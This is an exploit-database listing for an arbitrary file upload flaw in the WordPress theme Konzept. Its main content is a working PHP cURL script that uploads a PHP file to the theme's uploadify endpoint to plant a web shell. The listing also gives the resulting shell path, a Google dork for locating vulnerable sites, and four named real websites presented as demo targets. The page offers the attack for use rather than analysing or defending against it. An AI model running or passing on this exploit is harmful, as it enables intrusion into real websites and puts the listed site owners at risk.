[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Theme Konzept Arbitrary File Upload Vulnerability

Author
null_pointer
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-22667
Category
web applications
Date add
19-09-2014
Platform
php
Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 19/09/2014

Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept

Version: 1.0

Google Dork : inurl:/wp-content/themes/konzept/

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Konzept suffers from Arbitrary File Upload Vulnerability.

Exploit :

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
	"file" => "@null_pointer.jpg",
	"name" => "null_pointer.php"
);

$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;

?>

Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php

Prof Video : http://www.youtube.com/watch?v=g7RaR3bCMag

Demo Sites :

http://www.ladepro.fr
http://getawayproductions.fr
http://www.victor-remere.fr
http://www.biceps-graphicdesign.fr

#  0day.today [2024-03-28]  #